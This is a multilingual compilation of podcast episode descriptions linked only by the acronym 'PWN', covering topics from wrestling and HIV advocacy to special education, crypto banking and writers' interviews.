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Joel & Jeremy round out your wrestling week with news, notes, and previews!- WWE Evolution 2 is in the works, per PWN's Cory Hays- Where would a WWE Hall of Fame be located?- THE SENIOR SCRAMBLE @ JJSB!- More reaction to Gail Kim's TNA firing- Booking Moxley The Clairvoyant in AEW- WWE SmackDown, AEW Collision previews & MORE!Advertising Inquiries: https://redcircle.com/brandsPrivacy & Opt-Out: https://redcircle.com/privacy
Marnina "the Queen" Miller- a human rights activist and co-executive director at the Positive Women's Network (PWN)- recounts her journey living with HIV as a young woman in the American South, finding a sense of belonging in the national community of PWN, and spearheading initiatives for HIV advocacy and treatment for people of all backgrounds. Marnina discusses some of the unique challenges that Black women face within their communities as they search for inclusive care and acceptance after HIV diagnosis. She also delves deep into the world of policy, closely examining how political advocacy can impact HIV criminalization and reproductive rights. Marnina highlights the importance of coming together to provide comprehensive sexual health education. She emphasizes moving past equity and towards liberation from HIV stigma: “I want liberation... I don't want equity. I don't want equality. I want liberation. I want to be free of HIV stigma.” Read the transcript of the episode. About Positive Women's Network Marnina Miller's LinkedIn & Instagram Marnina Miller is a highly accomplished human rights activist, speaker, trainer, and social media strategist with a profound commitment to fostering positive change in society. She is currently the Co-Executive Director of the Positive Women's Network- a nationwide group that fosters support, care, and community for women living with HIV. Link to Past Episodes with Similar Content: Monica Gandhi, MD: HIV as a Movement, Not Just an Infection The Clitoris and Its Friends: The Anatomy of Pleasure with Rachel Gross Intimacy Starts with I: Women, Self Love, and HIV with Michelle Lopez
W tym odcinku „Rozmów w Dresie” Ania Kolasinska rozmawia z Gosią Serafin o depresji, zdrowiu psychicznym i stereotypach związanych z leczeniem psychiatrycznym. Poruszane są tematy dotyczące różnic w podejściu do terapii u kobiet i mężczyzn, wpływu pandemii na wzrost liczby zachorowań oraz funkcjonowania osób cierpiących na depresję. Serafin opowiada o własnych doświadczeniach związanych z depresją, o tym, jak objawy mogą być maskowane i dlaczego tak wiele osób nie szuka pomocy na czas. W rozmowie obalane są także mity na temat farmakoterapii, takie jak „leki zmieniają osobowość” czy „depresja to wymysł”. To ważna i potrzebna rozmowa, która rzuca światło na trudności związane ze zdrowiem psychicznym oraz na sposoby radzenia sobie z nimi.Kod WDRESIE daje 27% zniżki na książki Księgarni PWN https://ksiegarnia.pwn.pl/
Wszyscy jesteśmy rozproszeni i zabiegani. Teksty, które do nas docierają z komunikatorów, maili, stron i notatek służbowych domagają się jednak uwagi. Nie zawsze jesteśmy na nią gotowi. Co zrobić, żeby tekst przyciągał i był skonstruowany tak, żeby chciało się go przeczytać?6 praktycznych porad podają autorzy książki "Sztuka skutecznego pisania. Jak tworzyć treści, które przyciągają uwagę". Wiele zasad ma charakter formalny i nie trzeba być wybitnym pisarzem, żeby je spełnić. Omawiam je w tym odcinku i jednocześnie zapraszam do lektury całej książki, którą napisali dla nas Todd Rogers i Jessica Lasky-Fink. Książka właśnie ukazała się w Polsce, w tłumaczeniu Pawła Tomanka nakładem Wydawnictwa Naukowego PWN. Na zakup książki obowiązuje kod rabatowy (dobra26), który obniża cenę o 26%. Można go wykorzystać do końca roku także na inne drukowane książki PWN. Podcast powstał we współpracy z Wydawnictwem Naukowym PWN i zawiera treści sponsorowane.
In deze aflevering van de NOS Jeugdjournaalpodcast gaat het over drinkwater. Kinderen in Nederland weten niet beter dan dat drinkwater gewoon uit de kraan komt. Maar in de buurt van Apeldoorn is dat wel even anders. Daar is namelijk een poepbacterie in het drinkwater gevonden. Als je die binnenkrijgt kun je ziek worden. Annabelle en Pien gaan naar een plek waar drinkwater wordt gemaakt en praten daar met Erwin Cardol. Hij werkt voor waterzuiveringsbedrijf PWN in Andijk. Ze krijgen uitleg over de poepbacterie en een rondleiding in de drinkwaterfabriek. Want hoe houden we de poepbacterie uit ons drinkwater?
In this episode, PWN Founder, Richard Milroy with PWN member David Werdiger to discuss the evolving needs and expectations of wealthy families when it comes to their trusted advisors. As both a second-generation family member and an advisor to significant families, David brings a unique dual perspective to the conversation. He shares insights on the complexities faced by wealthy individuals and families. David explores the importance of integrated and collaborative advisory approaches to effectively serve their diverse needs. David also shares his significant involvement in the upcoming PWN Advisor Forum on 3 & 4 December in Melbourne where he will be sharing his experiences as a tech entrepreneur and the Principal of his own family office.
Ortodoksja - za słownik PWN, bezkrytyczne i rygorystyczne przestrzeganie zasad jakiegoś systemu światopoglądowego, połączone z brakiem zgody na jakąkolwiek zmianę w tych zasadach oraz z próbami - nawet siłowego - narzucania ich innym"Oczywiście słowo mocne i kojarzone głównie z religią, ale ciężko nam było znaleźć coś bardziej wymownego. A w jakich obszarach się może przejawiać? jest tylko jeden właściwy styl tańczenia każda fuzja to atak na "czystość stylu"mój instrutkor jest najmojszy i zna jedyną prawdziwą prawdę jak się jest w jednym stylu to nie ma co się rozglądać za innymi Poddajemy w wątpliwość wszystkie te postawy, zadajemy pytanie o toCzym jest ten "czysty" styl? Komu o tym decydować?Kiedy jest dobry moment żeby zacząć tańczyć coś jeszcze?Po co mamy się rozwijać w innych kierunkach?Czy nasi idole w danym stylu na pewno nie tańczą niczego innego? Temat bardzo obszerny i na pewno każdy może pomyśleć, jak to jest u niego - a to także się lubi zmieniać. Naszym celem jak zawsze jest nakłonić siebie i was do refleksji i złapania perspektywy. Literatura do polecenia: Dawid Epstein "Sięgaj jak najdalej - Dlaczego ludzie o szerokich zainteresowaniach wygrywają w wyspecjalizowanym świecie" Pamiętajcie że można nas znaleźć:
✅ PREMIERA książki MOMENTY: https://bit.ly/MomentyGK ✅ Zamów również Poradnik Zdrowia i Metamorfozę Finansową: https://bit.ly/KsiazkiGrzegorzKusz ______________________________ SPÓŹNIONA FAKTURA za PANDEMIĘ! Gościem dzisiejszego odcinka jest Profesor Grzegorz W. Kołodko – wykładowca ALK oraz uniwersytetów amerykańskich, autor wielu publikacji, były wicepremier i Minister Finansów. ➡ Książka Profesora ,,Gospodarka, Polityka, Społeczeństwo'' dostępna jest w księgarni internetowej PWN: https://ksiegarnia.pwn.pl/Gospodarka-Polityka-Spoleczenstwo,1047210448,p.html ______________________________
Z tego filmu dowiesz się, jak pisać teksty, które sprzedają, a także jak poruszać ich emocje. Opowie o tym Dariusz Puzyrkiewicz. Spis treści: 00:00 - W dzisiejszym odcinku 00:18 - Darek Puzyrkiewicz - czym się zajmuje na co dzień? 01:00 - Jak napisać własną książkę? 02:40 - Czy pisać książkę dla odbiorcy czy zgodnie z własnym sercem? 03:30 - Od czego zaczął Dariusz Puzyrkiewicz swoją przygodę z pisaniem? 04:40 - Czy sztuka może byc ponadczasowa? 05:40 - Jak pisać teksy które sprzedają? 07:40 - Jak słowem grać na emocjach odbiorców? 10:40 - Jaką radę dla przedsiębiorców ma Dariusz Puzyrkiewicz? 12:00 - Jak byc odpornym na krytykę odbiorców? 13:00 - Jaki błąd popełnił Dariusz w swojej karierze i czego się z tego nauczył? 13:50 - Jak na rynek copywriterów i marketingu wpłynie ChatGPT? 14:43 - Dlaczego tekst sprzedaje i ludzie kupują? Co przeważa nad ich decyzją? Gość
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Today's podcast is about our super athlete friend Risa August and her new book, “The Road Unpaved.” We first met Risa in 2019 when she came to the Pituitary World News/UCSF patient gathering. We chatted about her experience and and her plans to ride her bike from Canada to Mexico. We followed her herculean effort to ride 1845-plus miles to get from Canada to Mexico on the Pacific Coast Highway, which, as you can imagine, is no picnic for anyone, let alone if you are fighting acromegaly symptoms. It is downright amazing she did it at all. Now, she has written a book about her experience with acromegaly, the ride, and life. Learn more about Risa, her practice, her upcoming plans at Risa Unleashed, read her PWN articles search for Risa or Marisa here, or go to – www.risaaugust.com
Czym jest odpuszczanie? Według słownika PWN to:«darować komuś jakieś przewinienie» «zrezygnować z czegoś» i o rezygnowaniu i odpuszczaniu będzie dzisiaj. Odpuszczanie to proces, który pozwala uwolnić się od negatywnych emocji i skupić na pozytywnych aspektach życia. Warto odpuścić rzeczy, które nas nie uszczęśliwiają, a jednocześnie wytrwać w działaniu, które przynosi korzyści. Więcej na stronie:https://rozwojosobistydlakazdego.pl/rodk262Zapis na webinar: Podcast od A do Zhttps://lp.kurspodcastu.online/adozWesprzyj podcast na:https://patronite.pl/RODKlubhttps://buycoffee.to/rodk
Druga odsłona książkowego cyklu! W tym odcinku "Bibliotechy" usłyszysz o trzech książkach. Dwie opowiadają o sztucznej inteligencji i napisane są z kompletnie różnych punktów widzenia. Jedna jest amerykańska, jeszcze bez polskiego wydania i jedna polska. Polskiego autora jest też świeża nowość o Chinach budujących swoje - nie tylko technologiczne - imperium. Tytuły omawiane w podcaście: 1. “Chiński obwarzanek. Od Tajwanu po Tybet, czyli jak Chiny tworzą imperium” autorstwa Michała Lubiny, wydany przez wydawnictwo Szczeliny, w redakcji Rafała Czecha i Agnieszki Rzońcy. 2. “The Coming Wave: Technology, Power, and the Twenty-first Century's Greatest Dilemma” napisana przez nie byle kogo, bo przez Mustafę Suleymana, jednego z najbardziej uznanych badaczy i twórców algorytmów AI na świecie, oraz współzałożyciela spółki DeepMind, dziś należącej do Google'a. 3. “Zarażeni dźwiękiem. Rynek muzyczny w czasach sztucznej inteligencji” dr Stanisława Trzcińskiego - jedna z najobszerniejszych na rynku analiz dotyczących zmian na rynku muzyki. Wydana przez PWN a koordynatorką redakcji była Renata Ziółkowska. Autorki podcastu polecają także: - 22# Firma, która włada światem, jest na Tajwanie. Raczej nie znacie jej nazwy: https://audycje.tokfm.pl/podcast/131085,22-Firma-ktora-wlada-swiatem-jest-na-Tajwanie-Raczej-nie-znacie-jej-nazwy -46# Chińczycy przejmują po cichu. Dlaczego zakup Techlandu przez Tencent jest ważniejszy, niż podejrzewamy?: https://audycje.tokfm.pl/podcast/144077,46-Chinczycy-przejmuja-po-cichu-Dlaczego-zakup-Techlandu-przez-Tencent-jest-wazniejszy-niz-podejrzewamy - Jutronauci: https://wyborcza.pl/Jutronauci/7,165057,30255140,fani-generuja-za-pomoca-ai-plyty-ukochanych-artystow-efekty.html
The Special Ed Strategist Podcast with Wendy Taylor, M.Ed., ET/P
What's PWN? PWN, or Prior Written Notice, is your backstage pass to understanding school recommendations and your child's educational journey. It's your GPS, guiding you through changes in your child's education – from identification to FAPE. The Power of PWN PWN isn't just a piece of paper; it's a superhero cape for parents. It's your right to be informed and challenge decisions that might affect your child's education. Even if everyone's on the same page, PWN is your secret weapon to document IEP decisions. Your Right to PWN You have the right to request PWN. If it's not delivered, ask for it. It should be crystal clear, in your language, and easy to understand. Knowing the law, like Section 303-421 under IDEA, arms you to be the best advocate for your child. Conclusion PWN is your passport to active, informed, and powerful parenting in the special education process. It secures the support and services your child deserves – it's your key to success. Instagram - https://www.instagram.com/learningessentials/ LinkedIN - https://www.linkedin.com/in/wendy-taylor-7106b6a6/ Website: www.LearningEssentialsEDU.com
Ile razy zdarzyło ci się zastanawiać nad tym, jak brzmiałaby wspólna płyta Radiohead i Green Day? Albo wspólny album The Doors i Taylor Swift? Na polskim podwórku właśnie pojawiają się pierwsze jaskółki podobnych "produkcji". Ich "twórcą" jest sztuczna inteligencja. Kiedy wpuścimy tego "autora" na nasze playlisty? I jaki wpływ sztuczna inteligencja będzie miała na muzykę - od procesu kreatywnego i formowania naszej estetyki, aż po biznes muzyczny i możliwości artystów zarabiania na swojej twórczości? O tym Vadim Makarenko z firmy Statista rozmawia ze Stanisławem Trzcińskim, menedżerem kultury, współwłaścicielem agencji STX Music Solutions oraz autorem książki "Zarażeni dźwiękiem", która ukazała się nakładem wydawnictwa PWN. Więcej tekstów i rozmów o przyszłości znajdziesz w najnowszej edycji programu "Jutronauci": https://wyborcza.pl/jutronauci
Today, Dr. Scott Struthers talks to PWN about paltusotine, their new once-a-day acromegaly oral drug candidate. Crinetics recently published results from the latest phase of the paltusotine clinical trial. He discussed the results and provided a fascinating look at the details and their learning from the data as they analyzed these initial results. He also shared the status of a new drug for Cushing's and Congenital Adrenal Hyperplasia (CAH), currently entering phase 2 of a clinical trial. Don't miss it! For those following PWN, you may recall we recorded our first podcasts with Dr. Struthers when paltusotine entered its clinical trial in 2017. If you haven't heard it, I highly recommend it. It is really interesting to hear Dr. Struthers talk about their work on drugs for acromegaly and other neuroendocrine disorders and how the company has progressed since those early days. Also, if you'd like to learn more, listen to our podcast series on new drug development, "The Journey to a New Drug."
My guest today is Robert Baker. Robert spent 42 years at Mercer Consulting, where he held senior roles leading Investment Consulting and Client Relationships across geographies and businesses, and also leading DEI for the international regions, before DEI was really as mainstream as it is today. So, what does Robert do after a rich 42 year career? He starts his ‘next stage' portfolio career, using his power and privilege for good, and set up his own consulting firm, helping businesses, ecome more diverse and inclusive, especially training and coaching male leaders on how they can show up better for women and all genders at the workplace. In this episode, we talk about how Robert started at Mercer, how he navigated change, internal networks and politics during this long tenure and his advise to someone who in today's world is told that they need to keep moving externally to continue to grow We also talk about Robert's company Potentia Talent Consulting and the mission behind it, what made him start, how he got signed on by his first few clients, and whether he misses being in corporate. We cover a fair amout on how to shattering stereotypes and biases, and how doing this helps all genders, men included. Let's say there's a woman listening today and thinking, I'm in a company where they talk a pretty talk, but walking the talk is a far cry. What would Robert recommend this woman do, and how can men show up better at work? The answer pleasantly surprised me!Follow and learn more about Robert here:https://www.linkedin.com/in/robert-baker-potentia-talent-consulting/The PWN webinar we referred to during the conversation is here. Even thought it has already passed, follow them and Robert to learn more about biases, stereotypes, equity and change.-------------------------------Liked this episode? A few things:1. Share the podcast with three of your closest friends! And please leave a great review on Apple Podcasts here or Spotify here (tap on the three-dot menu under the cover art of the podcast) , as it would mean a lot to me and hopefully help others discover it. 2. You will love my emails called Charge-Up! I send them every few weeks, they're no fluff no spam, where I share my favourite career insights from movies, TV shows, news and my own personal experiences, that I don't share anywhere else. Make sure you sign up here! 3. Come hang out with me LIVE on LinkedIn and Youtube every Friday at 2 pm CET where I answer your questions and often bring in fab guests:LinkedIn: https://www.linkedin.com/in/sonalbahl/ Youtube: https://www.youtube.com/SuperChargeYourself4. Share your favourite takeaways and tag me on your Instagram and LinkedIn.
Fey is on a chores run to the SPCA and reveals a new surprise! But first, the Tenneseans on the Tour Bus who shared a lot of personal information. We have a NEW DOG! Piper is a 3 year old Akidu Inu/Husky. If you are seeing and hearing this post then I have resolved some issues with the PWN website.
Josef Je, PWN.xyz Joshua Garcia, Ketsal Seamus Rocca, Xapo Bank 00:00:44 - "There's an increasing belief that we're witnessing Operation Chokepoint 2.0 in action." 00:03:20 - "creating not just liquidity for assets, but also for price discovery, because that leads to stability and that leads to building the economy of things on top of all these blockchains." 00:10:44 - "there's definitely a lot of like shady stuff and a lot of like unfilled promises." 00:13:07 - "And, you know, I'm a believer in crypto. I think the tooling to get these appraisals right will get there eventually." 00:16:58 - "So you're borrowing against a physical Bitcoin." 00:20:58 - "The pressure for regulatory clarity is at an all time high from the crypto community." 00:25:05 - "I think this whole operation choke point is like some sort of real memo that was put out by some top level politicians out there to like actually choke out crypto companies and Bitcoin folks from our bank accounts." 00:28:23 - "Politics feels a little bit like entertainment." 00:31:00 - "Well, if a crypto offering is a clear securities offering, it's not for everyone." 00:33:49 - "So there's a massive disconnect between how the engineers think about this and how the lawyers and regulators think about this." 00:38:37 - "I'm a big advocate for either keeping your mouth shut or just saying what's true." 00:42:19 - "Here you have like highly regulated, amazing products that offer like great value proposition to customers all over the world by an OG company." 00:45:50 - "Hong Kong is very well placed to become a very strong powerhouse in the crypto space. And again, well, that's going to do it. It's a massively missed opportunity for the US, who could have easily run the crypto space." 00:48:11 - "Whereas now they've created this environment where people are scared of the regulator that if you touch crypto, they're going to come and smack you on the head." 00:51:52 - "If you're in Nigeria, Lebanon, Argentina, South Africa, anywhere where you're worried about country risk, you're worried about macroeconomic environment and inflation, having a dollar bank account is a luxury." 00:53:32 - "So that's certainly changed in the last few years, especially when Bitcoin was going to $65,000. It was hard to ignore it." 00:55:14 - "We're trying to say, look, we're this offshore bank account where anybody from anywhere can open an account here and you don't need to move that bank account when you move." 00:58:32 - "That literally was one of Satoshi's visions anyways, exactly what you just said."
For the final episode of Season Five, Courtney Harler speaks with two Courtneys, Courtney Zoffness and Courtney Maum. Maum is, of course, a returning guest, and Zoffness is new to the podcast.Courtney Zoffness is the author of the debut memoir in essays called Spilt Milk, out in 2021 from McSweeney's. As a fiction writer, Zoffness was the second-ever woman to win the Sunday Times Short Story Award in 2018, the world's richest prize for a single short story. She's taught for many institutions and currently directs the creative writing program at Drew University.Courtney Maum is the author of several novels, and most recently the memoir called The Year of the Horses, out in 2022 from Tin House. She's also helped countless writers navigate the publication process with her craft guide, Before and After the Book Deal. Courtney Maum is a writing coach and executive director of the nonprofit learning collaborative called The Cabins.Today we talk about the humble beginnings and early invisible work of writers, vulnerability, publication and promotion in the digital age, distractibility, reading recommendations, and more.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
Today Courtney speaks with two talented memoirists, Amy Long and Emma Bolden.Amy Long is the author of the debut memoir, Codependence, winner of the 2018 Essay Collection Competition with the Cleveland State University Poetry Center. Amy holds an MFA from Virginia Tech and an MA from the University of Florida. She's also the creative genius behind Taylor Swift as Books, the very popular Instagram account.Emma Bolden is the author of several chapbooks and collections of poetry. She is the recipient of fellowships from both the National Endowment for the Arts and the Alabama State Council on the Arts. Her debut memoir, Tiger in a Cage: A Memoir of a Body in Crisis, was published by Soft Skull Press in 2022.We discuss advocacy and agency in women's health, social media in service to the literary community, narrative structure and voice in memoir, and the joy found in artistic anticipation.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
In honor of National Poetry Month, we've invited back to the podcast one of our favorite poets, Mihaela Moscaliuc. Anna Qu, a prose writer, also joins the conversation.Anna Qu is the author of the critically acclaimed Made in China: A Memoir of Love and Labor. She holds an MFA in Creative Nonfiction from Sarah Lawrence College and teaches writing, both fiction and nonfiction, for several graduate programs. She's currently serving as a Black Mountain Institute Shearing Fellow in Las Vegas, Nevada.Mihaela Moscaliuc is the author of three collections of poetry: Cemetery Ink, Immigrant Model, and Father Dirt. Currently a program director and associate professor at Monmouth University in New Jersey, she's also a brilliant editor and translator. The two “Deep Cut” poems Mihaela shares with us in this episode can be found now in the current issue of the Gettysburg Review.Today we talk about navigating multiple languages and cultures, negotiating familial traditions and expectations, as well as overcoming shame and guilt as immigrant writers.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
Piękne, prastare limby są symbolem Tatr. W Polsce tylko tu występują w stanie dzikim. Rosną bardzo powoli, a pierwszy raz zakwitają w wieku około sześćdziesięciu lat. Są wyjątkowo odporne, a ich silnie rozwinięty system korzeniowy zapobiega wywrotom nawet podczas najpotężniejszych wiatrów halnych. Przez kilka stuleci człowiek intensywnie użytkował limby, co w niektórych miejscach przyczyniło się do ich zupełnego wyniszczenia. W dzisiejszym odcinku podcastu Z Miłości do Gór Bartek Solik rozmawia z prof. dr hab. inż. Jerzym Szwagrzykiem - kierownikiem Katedry Bioróżnorodności Leśnej na Uniwersytecie Rolniczym w Krakowie oraz z Antonim Ziębą - doktorem nauk leśnych z Tatrzańskiego Parku Narodowego. Zapraszamy! Na zdjęciu: limba nad Morskim Okiem. Fot. Bartek Solik Scenariusz, nagrania, montaż: Bartek Solik Materiały wykorzystane w audycji: Skrzydłowski T., Słama B., O drzewach, które wybrały Tatry, Zakopane. Szafer W., Dziesięć tysięcy lat historii lasu w Tatrach, Kraków 1966 Białobok S. (red.), Limba Pinus Cembra L. Nasze drzewa leśne, Zakład Dendrologii i Arboretum Kórnickie PAN, PWN, Warszawa - Poznań 1971 Zwijacz - Kozica T., Skrzydłowski T., Limba królowa tatrzańskich borów https://tpn.pl/poznaj/wody/rosliny/limba-krolowa-tatrzanskich-borow, dostęp 03.04.2023
Today, for Episode Five of Season Five, I'm talking with Janice Obuchowski and William Pei Shih. Janice and William first met as scholars at the 2017 Bread Loaf Writers' Conference and now continue to admire and support one another's work.Janice Obuchowski is the author of The Woods, a short story collection that won the prestigious John Simmons Short Fiction Award and was published by the University of Iowa Press in 2022. More stories have appeared or are forthcoming in Electric Literature, Alaska Quarterly Review, Gettysburg Review, Conjunctions, and elsewhere. She holds an MFA from the University of California, Irvine and lives in Middlebury, Vermont.William Pei Shih's short stories have appeared or are forthcoming in The Best American Short Stories 2020, McSweeney's Quarterly, The Asian American Literary Review, The Masters Review, Carve Magazine, and many others. William is a graduate of the Iowa Writers' Workshop with an MFA in Fiction. He lives in New York City and teaches at New York University.Today's topics include getting MAs and MFAs, melding critical analysis and creative writing, balancing interiority and exteriority, drafting and revising, swerving between literary genres, crafting sentences and structures, as well as exploring rural and urban landscapes in short fiction.We are taking a short spring break. We'll be back Tuesday, April 11, with Episode 6.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
The Special Ed Strategist Podcast with Wendy Taylor, M.Ed., ET/P
Episode Brief: Stepping into the world of Special Education can be challenging–with today's episodes we are joined by Jennifer Fisher who expertly guides through the differences of EMT, 504's, and IEP's. Join us as we discover new tips and guidance to take before, during, and after important assessments and meetings with the school.
Krystal A. Sital and Peter Mountford join me for Episode Four of Season Five.Krystal A. Sital is the author of the memoir Secrets We Kept: Three Women of Trinidad, a finalist for the PEN America Emerging Writers Award. Her essays have been anthologized in A Map Is Only One Story: Twenty Writers on Immigration, Family, and the Meaning of Home as well as Fury: Women's Lived Experiences in the Trump Era. Her work has also been featured in The New York Times, ELLE, The Huffington Post, Today's Parent, Salon, Catapult, LitHub, and elsewhere. Krystal currently teaches nonfiction writing.Peter Mountford is the author of two novels: A Young Man's Guide to Late Capitalism, which won the 2012 Washington State Book Award in Fiction, and The Dismal Science, which was named a New York Times Editors' Choice. His work has appeared in The Paris Review, The Southern Review, The Atlantic, The Sun, Granta, The Missouri Review, and Writer's Digest. Peter is also a writing coach and developmental editor.In this episode, we discuss writing a collaborative, code-switching memoir; learning, through failure, ways to capture and hold the reader's attention; and using voice, language, point of view, and setting to craft vivid, engaging, authentic prose on the page.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
For Episode Three of Season Five, Courtney talks to Lisa Lee Herrick and Lee Herrick. Yes, to be clear, they are married.Lisa Lee Herrick is an award-winning Hmong-American writer, illustrator, and producer. A 2021 PEN America Emerging Voices Fellow in Creative Nonfiction as well as a 2021 Finalist for the Restless Books Prize for New Immigrant Writing, Lisa is currently at work on her debut memoir.Lee Herrick is a Korean-American poet and professor. He is the author of three books of poetry: Scar and Flower, Gardening Secrets of the Dead, and This Many Miles from Desire. Lee Herrick was appointed as California Poet Laureate on November 18, 2022.Today we discuss language and power, immigration and adoption, and curiosity and empathy.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
Today's program focuses on interactions between the medical and psychological worlds. Join Dr. Blevins and me as we welcome PWN contributor, marriage and family therapist, and author Linda Rio for a fascinating discussion on how pituitary disease, or any chronic disease, manifests itself mentally and emotionally. Listen as we muse on how emotional health and psychological distress can affect people's daily lives and how they deal with their disorders. Our talk covers other interesting issues, including how the medical and psychological world intersect, doctor-patient interactions and expectations, the influence of social media, and dr. Google, and the sorry state of some people's interactions and behaviors.
For Episode Two of Season Five, Ray Brunt joins Courtney once more to talk with Pablo Cartaya.Pablo is the award-winning author of several books for children and young adults, as well as a screenwriter, speaker, and educator. His debut novel, The Epic Fail of Arturo Zamora, published in 2017. His latest novel, The Last Beekeeper, a climate dystopia, published in July of 2022.Today's topics include authenticity, voice, creative process, community, family, culture, identity, pandemic parenting, environmental responsibility, unions, and the literary adoration of abuelas.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
We launch Season Five with two wonderful writers, Rebecca Makkai and Meghan Lamb.Rebecca is the author of four novels and a collection of short stories. Her novel The Great Believers was a finalist for both the Pulitzer Prize and the National Book Award. Her latest novel, I Have Some Questions for You, publishes today from Penguin Random House.Meghan has authored several books, as well. Her debut novel, Failure to Thrive, launched in 2021, and her latest novel, Coward, published in September 2022 from Spuyten Duyvil. Meghan is also the lead singer of an eighties cinema-inspired band called Kill Scenes.In this first episode of the new season, we talk about how to be a “real writer,” how to pick the perfect title for your book, how to find strange jobs in strange towns, and how to break the rules.Content Warning: This episode contains potentially disturbing material, including graphic descriptions of death.PWN's Debut Review is hosted by Project Write Now, a nonprofit writing studio. Learn more at projectwritenow.org.
Here is something that most parents don't know, most parents don't know that they have an option if the school says no. Unfortunately, all schools and school districts don't always do what is in your child's best interest. When you have a child who will require additional educational support, learning and understanding special education isn't optional, it is necessary. So you have to be willing to invest the time to learn and understand it because if you count on the school to always provide your child everything they need, they will likely be missing out on services that could benefit them. Not every school or district is bad and not every one of them is good, but wouldn't it be nice to feel confident and just know that you know what your expectations should or shouldn't be without having to count on them? Wouldn't you like to be a knowledgeable and informed parent? Every IEP TEAM should look at the data to determine the student's needs in writing an IEP AND data is used to evaluate the student's progress on the goals as often as necessary. Data MUST be collected for an IEP team to work together for the student the way it was intended under IDEA. Some of you may have never heard of a PWN (Prior Written Notice) and that is ok. Some families go through their entire special education journey without ever having a PWN be part of it. If the district refuses your request they are obligated to give you a Prior Written Notice that outlines exactly what the district either proposes or refuses to do. If you want to learn strategies and tools that you can use to improve your life along this autism parenting journey, becoming Not Your Average Autism Mom is your answer. Is the educational journey overwhelming and confusing for you? Our member portal has an array of training and resources with everything you need to know about Special Education and you can join LIVE ZOOM calls with an Advocate to get any of your specific questions answered. Maybe you are feeling alone on your journey or maybe you are looking for other moms to connect with in a PRIVATE community who understand your day-to-day challenges, be sure that you check out ALL THE BENEFITS available for you when you BECOME Not Your Average Autism Mom. Additional Resources: Not Your Average Autism Mom - Become part of a COMMUNITY that understands this parenting journey because we live it every day, just like you. Autism vs Autistic, A Mom's Perspective Special Education Things That You Should Know The Evaluation Process of Special Education The Eligibility Determination Meeting & The Differences of a 504 Plan and an IEP What is an FBA and Why Your Child Might Need One
On this week's episode we are going dark and discussing a heavy hitter in the paranormal community, the infamous Shanghai Tunnels of Portland. Trigger warning. It's real dark. Name a bad thing and it will probably be mentioned today. Human trafficking, sexual assault, drugging, murder, cannibalism, racism. Yeah there's a lot today. I discovered in my travels in the PWN that there are actually Shanghai Tunnels in Portland, Astoria, and Seattle. I thought this was fascinating! But the Portland ones are probably the most famous amongst paranormal enthusiasts because they have been seen on every ghost show basically ever. There is a lot of history to get through, don't worry it's very dark and gruesome. I was so upset when I didn't get to go the first time I was in Portland so I made sure to go this time, and I'll probably go again this year too! I even had a ghostly experience that I'll tell you all about at the end. --- Send in a voice message: https://anchor.fm/myhauntedlife/message Support this podcast: https://anchor.fm/myhauntedlife/support
Vamos falar com a Talentosa Fernanda Barata, diretamente de Portugal sobre o seu Talento em Ação: ConexãoLicenciada em Ciências Farmacêuticas pela Universidade Clássica de Lisboa, concluiu a sua formação em gestão e liderança em universidades e escolas de negócios locais e internacionais.Com uma sólida e vasta experiência nas áreas de Recursos Humanos, como Diretora de Recursos Humanos da Accenture Portugal, e como membro da Equipe Executiva de Gestão participou na definição da estratégia de RH alinhada à estratégia de negócio desta empresa multinacional. Teve a oportunidade de trabalhar em diferentes geografias como Angola e Moçambique, tendo lançado dois escritórios em novos mercados, e trabalhado em programas com impacto na Península Ibérica, que lhe permitiram apreender diferentes culturas e novas formas de liderar as pessoas e compreender o negócio.Sendo uma Coach Gallup-Certified Strengths Coach e ACSTH - Coach certificada pelo ICF, uma das suas principais missões é ajudar as pessoas a crescer e alcançar o seu pleno potencial para atingir os seus objetivos pessoais e profissionais. Colabora com a liderança de RH e gestão de topo das empresas, desenvolvendo princípios e práticas de I&E&D, a fim de aumentar o compromisso da liderança com as metas de diversidade que se alinhem com a estratégia de pessoas e os objetivos de negócio. Com competências em people engagement, desenvolvimento de liderança, gestão de talentos e desenvolvimento organizacional, faz consultoria de RH apoiando empresas a aumentar sua produtividade, tendo experiência na gestão de diversas iniciativas estratégicas cross functional com foco no capital humano. É professora convidada em mestrados e pós-graduações, em diferentes instituições académicas e participou na publicação de vários livros dedicados à temática de recursos humanos e liderança. É uma voluntária apaixonada por temas de inclusão social, pertencendo atualmente ao advisory board da AIESEC, ao programa de Mentoria da PWN e da APAC.Top 10 da Fernanda: 1.Realização | 2.Positivo| 3.Estudioso| 4.Ativação | 5.Excelência | 6.Input | 7.Organização | 8.Conexão | 9.Relacionamento | 10.Individualização
Vamos falar com a Talentosa Fernanda Barata, diretamente de Portugal sobre o seu Talento em Ação: ConexãoLicenciada em Ciências Farmacêuticas pela Universidade Clássica de Lisboa, concluiu a sua formação em gestão e liderança em universidades e escolas de negócios locais e internacionais.Com uma sólida e vasta experiência nas áreas de Recursos Humanos, como Diretora de Recursos Humanos da Accenture Portugal, e como membro da Equipe Executiva de Gestão participou na definição da estratégia de RH alinhada à estratégia de negócio desta empresa multinacional. Teve a oportunidade de trabalhar em diferentes geografias como Angola e Moçambique, tendo lançado dois escritórios em novos mercados, e trabalhado em programas com impacto na Península Ibérica, que lhe permitiram apreender diferentes culturas e novas formas de liderar as pessoas e compreender o negócio.Sendo uma Coach Gallup-Certified Strengths Coach e ACSTH - Coach certificada pelo ICF, uma das suas principais missões é ajudar as pessoas a crescer e alcançar o seu pleno potencial para atingir os seus objetivos pessoais e profissionais. Colabora com a liderança de RH e gestão de topo das empresas, desenvolvendo princípios e práticas de I&E&D, a fim de aumentar o compromisso da liderança com as metas de diversidade que se alinhem com a estratégia de pessoas e os objetivos de negócio. Com competências em people engagement, desenvolvimento de liderança, gestão de talentos e desenvolvimento organizacional, faz consultoria de RH apoiando empresas a aumentar sua produtividade, tendo experiência na gestão de diversas iniciativas estratégicas cross functional com foco no capital humano. É professora convidada em mestrados e pós-graduações, em diferentes instituições académicas e participou na publicação de vários livros dedicados à temática de recursos humanos e liderança. É uma 